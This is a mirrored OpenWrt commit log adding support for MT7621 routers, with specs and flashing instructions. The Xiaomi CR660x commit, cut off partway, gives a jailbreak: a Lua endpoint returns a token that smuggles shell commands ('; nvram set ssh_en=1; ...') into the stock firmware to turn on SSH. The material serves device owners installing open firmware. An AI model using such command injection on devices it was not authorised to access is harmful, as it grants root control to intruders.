mirror of
https://github.com/openwrt/openwrt.git
synced 2025-01-24 21:37:14 +00:00
79107116d1
62 Commits
Author | SHA1 | Message | Date | |
---|---|---|---|---|
Shiji Yang
|
f7f9203854 |
ramips: add support for SIM SIMAX1800T and Haier HAR-20S2U1
SIM AX18T and Haier HAR-20S2U1 Wi-Fi6 AX1800 routers are designed based on Tenbay WR1800K. They have the same hardware circuits and u-boot. SIM AX18T has three carrier customized models: SIMAX1800M (China Mobile), SIMAX1800T (China Telecom) and SIMAX1800U (China Unicom). All of these models run the same firmware. Specifications: SOC: MT7621 + MT7905 + MT7975 ROM: 128 MiB RAM: 256 MiB LED: status *3 R/G/B Button: reset *1 + wps/mesh *1 Ethernet: lan *3 + wan *1 (10/100/1000Mbps) TTL Baudrate: 115200 TFTP Server: 192.168.1.254 TFTP IP: 192.168.1.28 or 192.168.1.160 (when envs is broken) MAC Address: use address source label 30:xx:xx:xx:xx:62 wan lan 30:xx:xx:xx:xx:65 factory.0x8004 wan 30:xx:xx:xx:xx:62 factory.0x8004 -3 wlan2g 30:xx:xx:xx:xx:64 factory.0x0004 wlan5g 32:xx:xx:xx:xx:64 factory.0x0004 set 7th bit TFTP Installation (initramfs image only & recommend): 1. Set local tftp server IP: 192.168.1.254 and NetMask: 255.255.255.0 2. Rename initramfs-kernel.bin to "factory.bin" and put it in the root directory of the tftp server. (tftpd64 is a good choice for Windows) 3. Start the TFTP server, plug in the power supply, and wait for the system to boot. 4. Backup "firmware" partition and rename it to "firmware.bin", we need it to back to stock firmware. 5. Use "fw_printenv" command to list envs. If "firmware_select=2" is observed then set u-boot enviroment: /# fw_setenv firmware_select 1 6. Apply sysupgrade.bin in OpenWrt LuCI. Web UI Installation: 1. Apply update by uploading initramfs-factory.bin to the web UI. 2. Use "fw_printenv" command to list envs. If "firmware_select=2" is observed then set u-boot enviroment: /# fw_setenv firmware_select 1 3. Apply squashfs-sysupgrade.bin in OpenWrt LuCI. Recovery to stock firmware: a. Upload "firmware.bin" to OpenWrt /tmp, then execute: /# mtd -r write /tmp/firmware.bin firmware b. We can also write factory image "UploadBrush-bin.img" to firmware partition to recovery. Upload image file to /tmp, then execute: /# mtd erase firmware /# mtd -r write /tmp/UploadBrush-bin.img firmware How to extract stock firmware image: Download stock firmware, then use openssl: openssl aes-256-cbc -d -salt -in [Downloaded_Firmware] \ -out "firmware.tar.tgz" -k QiLunSmartWL Signed-off-by: Chen Minqiang <ptpt52@gmail.com> Signed-off-by: Shiji Yang <yangshiji66@qq.com> |
||
Rosen Penev
|
f4eef5f2a1 |
ramips: add support for Linksys E7350
Linksys E7350 is an 802.11ax (Wi-Fi 6) router, based on MediaTek MT7621A. Specifications: - SoC: MT7621 (880MHz, 2 Cores) - RAM: 256 MB - Flash: 128 MB NAND - Wi-Fi: - MT7915D: 2.4/5 GHz (DBDC) - Ethernet: 5x 1GiE MT7530 - USB: 1x USB 3.0 - UART: J4 (57600 baud) - Pinout: [3V3] (TXD) (RXD) (blank) (GND) Notes: * This device has a dual-boot partition scheme, but this firmware works only on boot partition 1. Installation: Upload the generated factory.bin image via the stock web firmware updater. Signed-off-by: Rosen Penev <rosenp@gmail.com> |
||
Rosen Penev
|
26a6a6a60b |
ramips: add support for Belkin RT1800
Belkin RT1800 is an 802.11ax (Wi-Fi 6) router, based on MediaTek MT7621A. Specifications: - SoC: MT7621 (880MHz, 2 Cores) - RAM: 256 MB - Flash: 128 MB NAND - Wi-Fi: - MT7915D: 2.4/5 GHz (DBDC) - Ethernet: 5x 1GiE MT7530 - USB: 1x USB 3.0 - UART: J4 (57600 baud) - Pinout: [3V3] (TXD) (RXD) (blank) (GND) Notes: * This device has a dual-boot partition scheme, but this firmware works only on boot partition 1. Installation: Upload the generated factory.bin image via the stock web firmware updater. Signed-off-by: Rosen Penev <rosenp@gmail.com> |
||
Mikhail Zhilkin
|
85b41cbd3b |
ramips: add support for Beeline SmartBox TURBO
Beeline SmartBox TURBO is a wireless WiFi 5 router manufactured by Sercomm company. Device specification -------------------- SoC Type: MediaTek MT7621AT RAM: 256 MiB Flash: 256 MiB, Micron MT29F2G08ABAGA3W Wireless 2.4 GHz (MT7603EN): b/g/n, 2x2 Wireless 5 GHz (MT7615E): a/n/ac, 4x4 Ethernet: 5xGbE (WAN, LAN1, LAN2, LAN3, LAN4) USB ports: 1xUSB3.0 Button: 2 buttons (Reset & WPS) LEDs: 1 RGB LED Power: 12 VDC, 1.5 A Connector type: barrel Bootloader: U-Boot Installation ----------------- 1. Login to the router web interface (admin:admin) 2. Navigate to Settings -> WAN -> Add static IP interface (e.g. 10.0.0.1/255.255.255.0) 3. Navigate to Settings -> Remote cotrol -> Add SSH, port 22, 10.0.0.0/255.255.255.0 and interface created before 4. Change IP of your client to 10.0.0.2/255.255.255.0 and connect the ethernet cable to the WAN port of the router 5. Connect to the router using SSH shell (SuperUser:SNxxxxxxxxxx, where SNxxxxxxxxxx is the serial number from the backplate label) 6. Run in SSH shell: sh 7. Make a mtd backup (optional, see related section) 8. Change bootflag to Sercomm1 and reboot: printf 1 | dd bs=1 seek=7 count=1 of=/dev/mtdblock3 reboot 9. Login to the router web interface (admin:admin) 10. Remove dots from the OpenWrt factory image filename 11. Update firmware via web using OpenWrt factory image Revert to stock --------------- 1. Change bootflag to Sercomm1 in OpenWrt CLI and then reboot: printf 1 | dd bs=1 seek=7 count=1 of=/dev/mtdblock3 2. Optional: Update with any stock (Beeline) firmware if you want to overwrite OpenWrt in Slot 0 completely. mtd backup ---------- 1. Set up a tftp server (e.g. tftpd64 for windows) 2. Connect to a router using SSH shell and run the following commands: cd /tmp for i in 0 1 2 3 4 5 6 7 8 9 10; do nanddump -f mtd$i /dev/mtd$i; \ tftp -l mtd$i -p 10.0.0.2; md5sum mtd$i >> mtd.md5; rm mtd$i; done tftp -l mtd.md5 -p 10.0.0.2 MAC Addresses ------------- +-----+-----------+---------+ | use | address | example | +-----+-----------+---------+ | LAN | label | *:54 | | WAN | label + 1 | *:55 | | 2g | label + 4 | *:58 | | 5g | label + 5 | *:59 | +-----+-----------+---------+ The label MAC address was found in Factory 0x21000 Co-developed-by: Maximilian Weinmann <x1@disroot.org> Signed-off-by: Maximilian Weinmann <x1@disroot.org> Signed-off-by: Mikhail Zhilkin <csharper2005@gmail.com> |
||
André Valentin
|
2cc5059240 |
ramips: add support for ZyXEL LTE3301-Plus
The ZyXEL LTE3301-PLUS is an 4G indoor CPE with 2 external LTE antennas.
Specifications:
- SoC: MediaTek MT7621AT
- RAM: 256 MB
- Flash: 128 MB MB NAND (MX30LF1G18AC)
- WiFi: MediaTek MT7615E
- Switch: 4 LAN ports (Gigabit)
- LTE: Quectel EG506 connected by USB3 to SoC
- SIM: 1 micro-SIM slot
- USB: USB3 port
- Buttons: Reset, WPS
- LEDs: Multicolour power, internet, LTE, signal, Wifi, USB
- Power: 12V, 1.5A
The device is built as an indoor ethernet to LTE bridge or router with
Wifi.
UART Serial:
57600N1
Located on populated 5 pin header J5:
[o] GND
[ ] key - no pin
[o] RX
[o] TX
[o] 3.3V Vcc
MAC assignment:
lan: 98:0d:67:ee:85:54 (base, on the device back)
wlan: 98:0d:67:ee:85:55
Installation from web GUI:
- Log in as "admin" on http://192.168.1.1/
- Upload OpenWrt initramfs-recovery.bin image on the
Maintenance -> Firmware page
- Wait for OpenWrt to boot and ssh to root@192.168.1.1
- format ubi device: ubiformat /dev/mtd6
- attach ubi device: ubiattach -m6
- create rootfs volume: ubimkvol /dev/ubi0 -n0 -N rootfs -s 1MiB
- rootfs_data volume: ubimkvol /dev/ubi0 -n1 -N rootfs_data -s 1MiB
- run sysupgrade with sysupgrade image
For more details about flashing see
commit
|
||
Shiji Yang
|
1330816178 |
ramips: add support for H3C TX1800 Plus / TX1801 Plus / TX1806
H3C TX180x series WiFi6 routers are customized by different carrier. While these three devices look different, they use the same motherboard inside. Another minor difference comes from the model name definition in the u-boot environment variable. Specifications: SOC: MT7621 + MT7915 ROM: 128 MiB RAM: 256 MiB LED: status *2 Button: reset *1 + wps/mesh *1 Ethernet: lan *3 + wan *1 (10/100/1000Mbps) TTL Baudrate: 115200 TFTP server IP: 192.168.124.99 MAC Address: use address(sample 1) address(sample 2) source label 88:xx:xx:98:xx:12 88:xx:xx:a2:xx:a5 u-boot-env@ethaddr lan 88:xx:xx:98:xx:13 88:xx:xx:a2:xx:a6 $label +1 wan 88:xx:xx:98:xx:12 88:xx:xx:a2:xx:a5 $label WiFi4_2G 8a:xx:xx:58:xx:14 8a:xx:xx:52:xx:a7 (Compatibility mode) WiFi5_5G 8a:xx:xx:b8:xx:14 8a:xx:xx:b2:xx:a7 (Compatibility mode) WiFi6_2G 8a:xx:xx:18:xx:14 8a:xx:xx:12:xx:a7 WiFi6_5G 8a:xx:xx:78:xx:14 8a:xx:xx:72:xx:a7 Compatibility mode is used to guarantee the connection of old devices that only support WiFi4 or WiFi5. TFTP + TTL Installation: Although a TTL connection is required for installation, we do not need to tear down it. We can find the TTL port from the cooling hole at the bottom. It is located below LAN3 and the pins are defined as follows: |LAN1|LAN2|LAN3|----|WAN| -------------------- |GND|TX|RX|VCC| 1. Set tftp server IP to 192.168.124.99 and put initramfs firmware in server's root directory, rename it to a simple name "initramfs.bin". 2. Plug in the power supply and wait for power on, connect the TTL cable and open a TTL session, enter "reboot", then enter "Y" to confirm. Finally push "0" to interruput boot while booting. 3. Execute command to install a initramfs system: # tftp 0x80010000 192.168.124.99:initramfs.bin # bootm 0x80010000 4. Backup nand flash by OpenWrt LuCI or dd instruction. We need those partitions if we want to back to stock firmwre due to official website does not provide download link. # dd if=/dev/mtd1 of=/tmp/u-boot-env.bin # dd if=/dev/mtd4 of=/tmp/firmware.bin 5. Edit u-boot env to ensure use default bootargs and first image slot: # fw_setenv bootargs # fw_setenv bootflag 0 6. Upgrade sysupgrade firmware. 7. About restore stock firmware: flash the "firmware" and "u-boot-env" partitions that we backed up in step 4. # mtd write /tmp/u-boot-env.bin u-boot-env # mtd write /tmp/firmware.bin firmware Additional Info: The H3C stock firmware has a 160-byte firmware header that appears to use a non-standard CRC32 verification algorithm. For this part of the data, the u-boot does not check it so we can just directly replace it with a placeholder. Signed-off-by: Shiji Yang <yangshiji66@qq.com> |
||
David Bauer
|
a0b7fef0ff |
ramips: add support for ZyXEL NWA50AX / NWA55AXE
Hardware -------- CPU: Mediatek MT7621 RAM: 256M DDR3 FLASH: 128M NAND ETH: 1x Gigabit Ethernet WiFi: Mediatek MT7915 (2.4/5GHz 802.11ax 2x2 DBDC) BTN: 1x Reset (NWA50AX only) LED: 1x Multi-Color (NWA50AX only) UART Console ------------ NWA50AX: Available below the rubber cover next to the ethernet port. NWA55AXE: Available on the board when disassembling the device. Settings: 115200 8N1 Layout: <12V> <LAN> GND-RX-TX-VCC Logic-Level is 3V3. Don't connect VCC to your UART adapter! Installation Web-UI ------------------- Upload the Factory image using the devices Web-Interface. As the device uses a dual-image partition layout, OpenWrt can only installed on Slot A. This requires the current active image prior flashing the device to be on Slot B. If the currently installed image is started from Slot A, the device will flash OpenWrt to Slot B. OpenWrt will panic upon first boot in this case and the device will return to the ZyXEL firmware upon next boot. If this happens, first install a ZyXEL firmware upgrade of any version and install OpenWrt after that. Installation TFTP ----------------- This installation routine is especially useful in case * unknown device password (NWA55AXE lacks reset button) * bricked device Attach to the UART console header of the device. Interrupt the boot procedure by pressing Enter. The bootloader has a reduced command-set available from CLI, but more commands can be executed by abusing the atns command. Boot a OpenWrt initramfs image available on a TFTP server at 192.168.1.66. Rename the image to owrt.bin $ atnf owrt.bin $ atna 192.168.1.88 $ atns "192.168.1.66; tftpboot; bootm" Upon booting, set the booted image to the correct slot: $ zyxel-bootconfig /dev/mtd10 get-status $ zyxel-bootconfig /dev/mtd10 set-image-status 0 valid $ zyxel-bootconfig /dev/mtd10 set-active-image 0 Copy the OpenWrt ramboot-factory image to the device using scp. Write the factory image to NAND and reboot the device. $ mtd write ramboot-factory.bin firmware $ reboot Signed-off-by: David Bauer <mail@david-bauer.net> |
||
Wenli Looi
|
0f068e7c4a
|
ramips: add support for Netgear WAX202
Netgear WAX202 is an 802.11ax (Wi-Fi 6) router. Specifications: * SoC: MT7621A * RAM: 512 MiB NT5CC256M16ER-EK * Flash: NAND 128 MiB F59L1G81MB-25T * Wi-Fi: * MT7915D: 2.4/5 GHz (DBDC) * Ethernet: 4x 1GbE * Switch: SoC built-in * USB: None * UART: 115200 baud (labeled on board) Load addresses (same as ipTIME AX2004M): * stock * 0x80010000: FIT image * 0x81001000: kernel image -> entry * OpenWrt * 0x80010000: FIT image * 0x82000000: uncompressed kernel+relocate image * 0x80001000: relocated kernel image -> entry Installation: * Flash the factory image through the stock web interface, or TFTP to the bootloader. NMRP can be used to TFTP without opening the case. * Note that the bootloader accepts both encrypted and unencrypted images, while the stock web interface only accepts encrypted ones. Revert to stock firmware: * Flash the stock firmware to the bootloader using TFTP/NMRP. References in WAX202 GPL source: https://www.downloads.netgear.com/files/GPL/WAX202_V1.0.5.1_Source.rar * openwrt/target/linux/ramips/dts/mt7621-ax-nand-wax202.dts DTS file for this device. Signed-off-by: Wenli Looi <wlooi@ucalgary.ca> |
||
Mikhail Zhilkin
|
bd783fd60a |
ramips: add support for Beeline SmartBox GIGA
Beeline SmartBox GIGA is a wireless WiFi 5 router manufactured by Sercomm company. Device specification -------------------- SoC Type: MediaTek MT7621AT RAM: 256 MiB, Nanya NT5CC128M16JR-EK Flash: 128 MiB, Macronix MX30LF1G18AC Wireless 2.4 GHz (MT7603EN): b/g/n, 2x2 Wireless 5 GHz (MT7613BE): a/n/ac, 2x2 Ethernet: 3 ports - 2xGbE (WAN, LAN1), 1xFE (LAN2) USB ports: 1xUSB3.0 Button: 1 button (Reset/WPS) PCB ID: DBE00B-1.6MM LEDs: 1 RGB LED Power: 12 VDC, 1.5 A Connector type: barrel Bootloader: U-Boot Installation ----------------- 1. Downgrade stock (Beeline) firmware to v.1.0.02; 2. Give factory OpenWrt image a shorter name, e.g. 1001.img; 3. Upload and update the firmware via the original web interface. Remark: You might need make the 3rd step twice if your running firmware is booted from the Slot 1 (Sercomm0 bootflag). The stock firmware reverses the bootflag (Sercomm0 / Sercomm1) on each firmware update. Revert to stock --------------- 1. Change the bootflag to Sercomm1 in OpenWrt CLI and then reboot: printf 1 | dd bs=1 seek=7 count=1 of=/dev/mtdblock3 2. Optional: Update with any stock (Beeline) firmware if you want to overwrite OpenWrt in Slot 0 completely. MAC Addresses ------------- +-----+-----------+---------+ | use | address | example | +-----+-----------+---------+ | LAN | label | *:16 | | WAN | label + 1 | *:17 | | 2g | label + 4 | *:1a | | 5g | label + 5 | *:1b | +-----+-----------+---------+ The label MAC address was found in Factory 0x21000 Notes ----- 1. The following scripts are required for the build: sercomm-crypto.py - already exists in OpenWrt sercomm-partition-tag.py - already exists in OpenWrt sercomm-payload.py - already exists in OpenWrt sercomm-pid.py - new, the part of this pull request sercomm-kernel-header.py - new, the part of this pull request 2. This device (same as other Sercomm S2,S3-based devices) requires special LZMA and LOADADDR settings for successful boot: LZMA_TEXT_START=0x82800000 KERNEL_LOADADDR=0x81001000 LOADADDR=0x80001000 3. This device (same as several other Sercomm-based devices - Beeline, Netgear, Etisalat, Rostelecom) has partition map (mtd1) containing real partition offsets, which may differ from device to device depending on the number and location of bad blocks on NAND. "fixed-partitions" is used if the partition map is not found or corrupted. This behavour (it's the same as on stock firmware) is provided by MTD_SERCOMM_PARTS module. Signed-off-by: Mikhail Zhilkin <csharper2005@gmail.com> |
||
Chuncheng Chen
|
8c00fd9b45 |
ramips: add support for ASUS RT-AX53U
Specifications: - Device: ASUS RT-AX53U - SoC: MT7621AT - Flash: 128MB - RAM: 256MB - Switch: 1 WAN, 3 LAN (10/100/1000 Mbps) - WiFi: MT7905 2x2 2.4G + MT7975 2x2 5G - Ports: USB 3.0 - LEDs: 1x POWER (blue, configurable) 3x LAN (blue, configurable) 1x WAN (blue, configurable) 1x USB (blue, not configurable) 1x 2.4G (blue, not configurable) 1x 5G (blue, not configurable) Flash by U-Boot TFTP method: - Configure your PC with IP 192.168.1.2 - Set up TFTP server and put the factory.bin image on your PC - Connect serial port(rate:115200) and turn on AP, then interrupt "U-Boot Boot Menu" by hitting any key Select "2. Upgrade firmware" Press enter when show "Run firmware after upgrading? (Y/n):" Select 0 for TFTP method Input U-Boot's IP address: 192.168.1.1 Input TFTP server's IP address: 192.168.1.2 Input IP netmask: 255.255.255.0 Input file name: openwrt-ramips-mt7621-asus_rt-ax53u-squashfs-factory.bin - Restart AP aftre see the log "Firmware upgrade completed!" Signed-off-by: Chuncheng Chen <ccchen1984@gmail.com> (replaced led label, added key-* prefix to buttons, added note about BBT) Signed-off-by: Christian Lamparter <chunkeey@gmail.com> |
||
Bjørn Mork
|
79112e7d47 |
ramips: force ZyXEL NR7101 to boot from "Kernel" partition
Make sure BootingFlag points to the system partition we install to. The BootingFlag variable selects which system partition the system boots from (0 => "Kernel", 1 => "Kernel2"). OpenWrt does not yet have device specific support for this dual image scheme, and can therefore only boot from "Kernel". This has not been an issue until now, since all known OEM firmware versions have ignored "Kernel2" - leaving the BootingFlag fixed at 0. But the newest OEM firmware has a new upgrade procedure, installing to the "inactive" system partition and setting BootingFlag accordingly. This workaround is needed until the dual image scheme is fully supported. Signed-off-by: Bjørn Mork <bjorn@mork.no> |
||
Mikhail Zhilkin
|
498c15376b |
ramips: add support for MTS WG430223
MTS WG430223 is a wireless AC1300 (WiFi 5) router manufactured by Arcadyan company. It's very similar to Beeline Smartbox Flash (Arcadyan WG443223). Device specification -------------------- SoC Type: MediaTek MT7621AT RAM: 128 MiB Flash: 128 MiB (Winbond W29N01HV) Wireless 2.4 GHz (MT7615DN): b/g/n, 2x2 Wireless 5 GHz (MT7615DN): a/n/ac, 2x2 Ethernet: 3xGbE (WAN, LAN1, LAN2) USB ports: No Button: 1 (Reset/WPS) LEDs: 2 (Red, Green) Power: 12 VDC, 1 A Connector type: Barrel Bootloader: U-Boot (Ralink UBoot Version: 5.0.0.2) OEM: Arcadyan WG430223 Installation ------------ 1. Login to the router web interface (superadmin:serial number) 2. Navigate to Administration -> Miscellaneous -> Access control lists & enable telnet & enable "Remote control from any IP address" 3. Connect to the router using telnet (default admin:admin) 4. Place *factory.trx on any web server (192.168.1.2 in this example) 5. Connect to the router using telnet shell (no password required) 6. Save MAC adresses to U-Boot environment: uboot_env --set --name eth2macaddr --value $(ifconfig | grep eth2 | \ awk '{print $5}') uboot_env --set --name eth3macaddr --value $(ifconfig | grep eth3 | \ awk '{print $5}') uboot_env --set --name ra0macaddr --value $(ifconfig | grep ra0 | \ awk '{print $5}') uboot_env --set --name rax0macaddr --value $(ifconfig | grep rax0 | \ awk '{print $5}') 7. Ensure that MACs were saved correctly: uboot_env --get --name eth2macaddr uboot_env --get --name eth3macaddr uboot_env --get --name ra0macaddr uboot_env --get --name rax0macaddr 8. Download and write the OpenWrt images: cd /tmp wget http://192.168.1.2/factory.trx mtd_write erase /dev/mtd4 mtd_write write factory.trx /dev/mtd4 9. Set 1st boot partition and reboot: uboot_env --set --name bootpartition --value 0 Back to Stock ------------- 1. Run in the OpenWrt shell: fw_setenv bootpartition 1 reboot 2. Optional step. Upgrade the stock firmware with any version to overwrite the OpenWrt in Slot 1. MAC addresses ------------- +-----------+-------------------+----------------+ | Interface | MAC | Source | +-----------+-------------------+----------------+ | label | A4:xx:xx:51:xx:F4 | No MACs was | | LAN | A4:xx:xx:51:xx:F6 | found on Flash | | WAN | A4:xx:xx:51:xx:F4 | [1] | | WLAN_2g | A4:xx:xx:51:xx:F5 | | | WLAN_5g | A6:xx:xx:21:xx:F5 | | +-----------+-------------------+----------------+ [1]: a. Label wasb't found neither in factory nor in other places. b. MAC addresses are stored in encrypted partition "glbcfg". Encryption key hasn't known yet. To ensure the correct MACs in OpenWrt, a hack with saving of the MACs to u-boot-env during the installation was applied. c. Default Ralink ethernet MAC address (00:0C:43:28:80:A0) was found in "Factory" 0xfff0. It's the same for all MTS WG430223 devices. OEM firmware also uses this MAC when initialazes ethernet driver. In OpenWrt we use it only as internal GMAC (eth0), all other MACs are unique. Therefore, there is no any barriers to the operation of several MTS WG430223 devices even within the same broadcast domain. Stock firmware image format --------------------------- The same as Beeline Smartbox Flash but with another trx magic +--------------+---------------+----------------------------------------+ | Offset | | Description | +==============+===============+========================================+ | 0x0 | 31 52 48 53 | TRX magic "1RHS" | +--------------+---------------+----------------------------------------+ Signed-off-by: Mikhail Zhilkin <csharper2005@gmail.com> |
||
Andreas Böhler
|
9ee6ac00c4 |
ramips: Add support for SERCOMM NA502S
The SERCOMM NA502s is a smart home gateway manufactured by SERCOMM and sold under different brands (among others, A1 Telekom Austria SmartHome Premium Gateway). It has multi-protocol radio support in addition to LAN and WiFi. Note: BLE and audio are currently unsupported. Specifications -------------- - MT7621ST 880MHz, Single-Core, Dual-Thread - MT7603EN 2.4GHz WiFi - MT7662EN 5GHz WiFi + BLE - 128MiB NAND - 256MiB DDR3 RAM - SD3503 ZWave Controller - EM357 Zigbee Coordinator - Telit UMTS module - Rechargeable battery - speaker and microphone MAC address assignment ---------------------- LAN MAC is read from the config partition, WiFi 2.4GHz is LAN+2 and matches the OEM firmware. WiFi 5GHz with LAN+1 is an educated guess since the OEM firmware does not enable 5GHz WiFi. Installation ------------ Attach serial console, then boot the initramfs image via TFTP. Once inside OpenWrt, run sysupgrade -n with the sysupgrade file. Attention: The device has a dual-firmware design. We overwrite kernel2, since kernel1 contains an automatic recovery image. If you get NAND ECC errors and are stuck with bad eraseblocks, try to erase the mtd partition first with mtd unlock ubi mtd erase ubi This should only be needed once. Signed-off-by: Andreas Böhler <dev@aboehler.at> |
||
Mikhail Zhilkin
|
f8b02130d2 |
ramips: add support for Beeline SmartBox Flash
Beeline SmartBox Flash is a wireless AC1300 (WiFi 5) router manufactured by Arcadyan company. Device specification -------------------- SoC Type: MediaTek MT7621AT RAM: 256 MiB, Winbond W632GU6NB Flash: 128 MiB (NAND), Winbond W29N01HVSINF Wireless 2.4 GHz (MT7615DN): b/g/n, 2x2 Wireless 5 GHz (MT7615DN): a/n/ac, 2x2 Ethernet: 3xGbE (WAN, LAN1, LAN2) USB ports: 1xUSB3.0 Button: 1 (Reset/WPS) LEDs: 1 RGB LED Power: 12 VDC, 1.5 A Connector type: Barrel Bootloader: U-Boot (Ralink UBoot Version: 5.0.0.2) OEM: Arcadyan WE42022 Installation ------------ 1. Place *factory.trx on any web server (192.168.1.2 in this example) 2. Connect to the router using telnet shell (no password required) 3. Save MAC adresses to U-Boot environment: uboot_env --set --name eth2macaddr --value $(ifconfig | grep eth2 | \ awk '{print $5}') uboot_env --set --name eth3macaddr --value $(ifconfig | grep eth3 | \ awk '{print $5}') uboot_env --set --name ra0macaddr --value $(ifconfig | grep ra0 | \ awk '{print $5}') uboot_env --set --name rax0macaddr --value $(ifconfig | grep rax0 | \ awk '{print $5}') 4. Ensure that MACs were saved correctly: uboot_env --get --name eth2macaddr uboot_env --get --name eth3macaddr uboot_env --get --name ra0macaddr uboot_env --get --name rax0macaddr 5. Download and write the OpenWrt images: cd /tmp wget http://192.168.1.2/factory.trx mtd_write erase /dev/mtd4 mtd_write write factory.trx /dev/mtd4 6. Set 1st boot partition and reboot: uboot_env --set --name bootpartition --value 0 reboot Back to Stock ------------- 1. Run in the OpenWrt shell: fw_setenv bootpartition 1 reboot 2. Optional step. Upgrade the stock firmware with any version to overwrite the OpenWrt in Slot 1. MAC addresses ------------- +-----------+-------------------+----------------+ | Interface | MAC | Source | +-----------+-------------------+----------------+ | label | 30:xx:xx:51:xx:09 | No MACs was | | LAN | 30:xx:xx:51:xx:09 | found on Flash | | WAN | 30:xx:xx:51:xx:06 | [1] | | WLAN_2g | 30:xx:xx:51:xx:07 | | | WLAN_5g | 32:xx:xx:41:xx:07 | | +-----------+-------------------+----------------+ [1]: a. Label wasb't found neither in factory nor in other places. b. MAC addresses are stored in encrypted partition "glbcfg". Encryption key hasn't known yet. To ensure the correct MACs in OpenWrt, a hack with saving of the MACs to u-boot-env during the installation was applied. c. Default Ralink ethernet MAC address (00:0C:43:28:80:36) was found in "Factory" 0xfff0. It's the same for all Smartbox Flash devices. OEM firmware also uses this MAC when initialazes ethernet driver. In OpenWrt we use it only as internal GMAC (eth0), all other MACs are unique. Therefore, there is no any barriers to the operation of several Smartbox Flash devices even within the same broadcast domain. Stock firmware image format --------------------------- +--------------+---------------+----------------------------------------+ | Offset | 1.0.15 | Description | +==============+===============+========================================+ | 0x0 | 5d 43 6f 74 | TRX magic "]Cot" | +--------------+---------------+----------------------------------------+ | 0x4 | 00 70 ff 00 | Length (reverse) | +--------------+---------------+----------------------------------------+ | | | htonl(~crc) from 0xc ("flag_version") | | 0x8 | 72 b3 93 16 | to "Length" | +--------------+---------------+----------------------------------------+ | 0xc | 00 00 01 00 | Flags | +--------------+---------------+----------------------------------------+ | | | Offset (reverse) of Kernel partition | | 0x10 | 1c 00 00 00 | from the start of the header | +--------------+---------------+----------------------------------------+ | | | Offset (reverse) of RootFS partition | | 0x14 | 00 00 42 00 | from the start of the header | +--------------+---------------+----------------------------------------+ | 0x18 | 00 00 00 00 | Zeroes | +--------------+---------------+----------------------------------------+ | 0x1c | 27 05 19 56 … | Kernel data + zero padding | +--------------+---------------+----------------------------------------+ | | | RootFS data (starting with "hsqs") + | | 0x420000 | 68 73 71 73 … | zero padding to "Length" | +--------------+---------------+----------------------------------------+ | | | Some signature data (format is | | | | unknown). Necessary for the fw | | "Lenght" | 00 00 00 00 … | update via oem fw web interface. | +--------------+---------------+----------------------------------------+ | "Lenght" + | | TRX magic "HDR0". U-Boot is | | 0x10c | 48 44 52 30 | checking it at every boot. | +--------------+---------------+----------------------------------------+ | | | 1.00: | | | | Zero padding to ("Lenght" + 0x23000) | | | | 1.0.12: | | | | Zero padding to ("Lenght" + 0x2a000) | | "Lenght" + | | 1.0.13, 1.0.15, 1.0.16: | | 0x110 | 00 00 00 00 | Zero padding to ("Lenght" + 0x10000) | +--------------+---------------+----------------------------------------+ Signed-off-by: Mikhail Zhilkin <csharper2005@gmail.com> |
||
Sungbo Eo
|
37753f34ac |
ramips: add support for ipTIME AX2004M
ipTIME AX2004M is an 802.11ax (Wi-Fi 6) router, based on MediaTek MT7621A. Specifications: * SoC: MT7621A * RAM: 256 MiB * Flash: NAND 128 MiB * Wi-Fi: * MT7915D: 2.4/5 GHz (DBDC) * Ethernet: 5x 1GbE * Switch: SoC built-in * USB: 1x 3.0 * UART: J4 (115200 baud) * Pinout: [3V3] (TXD) (RXD) (GND) MAC addresses: | interface | MAC address | source | comment |-----------|-------------------|----------------|--------- | LAN | 58:xx:xx:00:xx:9B | | [1] | WAN | 58:xx:xx:00:xx:99 | | | WLAN 2G | 58:xx:xx:00:xx:98 | factory 0x4 | | WLAN 5G | 5A:xx:xx:40:xx:98 | | | | 58:xx:xx:00:xx:98 | config ethaddr | [1] Used in this patch as WLAN 5G MAC address with the local bit set Load addresses: * stock * 0x80010000: FIT image * 0x81001000: kernel image -> entry * OpenWrt * 0x80010000: FIT image * 0x82000000: uncompressed kernel+relocate image * 0x80001000: relocated kernel image -> entry Notes: * This device has a dual-boot partition scheme, but this firmware works only on boot partition 1. The stock web interface will flash only on the inactive boot partition, but the recovery web page will always flash on boot partition 1. Installation via recovery mode: 1. Press reset button, power up the device, wait >10s for CPU LED to stop blinking. 2. Upload recovery image through the recovery web page at 192.168.0.1. Revert to stock firmware: 1. Install stock image via recovery mode. Signed-off-by: Sungbo Eo <mans0n@gorani.run> |
||
Raymond Wang
|
3343ca7e68 |
ramips: add support for Xiaomi Mi Router CR660x series
Xiaomi Mi Router CR6606 is a Wi-Fi6 AX1800 Router with 4 GbE Ports. Alongside the general model, it has three carrier customized models: CR6606 (China Unicom), CR6608 (China Mobile), CR6609 (China Telecom) Specifications: - SoC: MediaTek MT7621AT - RAM: 256MB DDR3 (ESMT M15T2G16128A) - Flash: 128MB NAND (ESMT F59L1G81MB) - Ethernet: 1000Base-T x4 (MT7530 SoC) - WLAN: 2x2 2.4GHz 574Mbps + 2x2 5GHz 1201Mbps (MT7905DAN + MT7975DN) - LEDs: System (Blue, Yellow), Internet (Blue, Yellow) - Buttons: Reset, WPS - UART: through-hole on PCB ([VCC 3.3v](RX)(GND)(TX) 115200, 8n1) - Power: 12VDC, 1A Jailbreak Notes: 1. Get shell access. 1.1. Get yourself a wireless router that runs OpenWrt already. 1.2. On the OpenWrt router: 1.2.1. Access its console. 1.2.2. Create and edit /usr/lib/lua/luci/controller/admin/xqsystem.lua with the following code (exclude backquotes and line no.): ``` 1 module("luci.controller.admin.xqsystem", package.seeall) 2 3 function index() 4 local page = node("api") 5 page.target = firstchild() 6 page.title = ("") 7 page.order = 100 8 page.index = true 9 page = node("api","xqsystem") 10 page.target = firstchild() 11 page.title = ("") 12 page.order = 100 13 page.index = true 14 entry({"api", "xqsystem", "token"}, call("getToken"), (""), 103, 0x08) 15 end 16 17 local LuciHttp = require("luci.http") 18 19 function getToken() 20 local result = {} 21 result["code"] = 0 22 result["token"] = "; nvram set ssh_en=1; nvram commit; sed -i 's/channel=.*/channel=\"debug\"/g' /etc/init.d/dropbear; /etc/init.d/drop bear start;" 23 LuciHttp.write_json(result) 24 end ``` 1.2.3. Browse http://{OWRT_ADDR}/cgi-bin/luci/api/xqsystem/token It should give you a respond like this: {"code":0,"token":"; nvram set ssh_en=1; nvram commit; ..."} If so, continue; Otherwise, check the file, reboot the rout- er, try again. 1.2.4. Set wireless network interface's IP to 169.254.31.1, turn off DHCP of wireless interface's zone. 1.2.5. Connect to the router wirelessly, manually set your access device's IP to 169.254.31.3, make sure 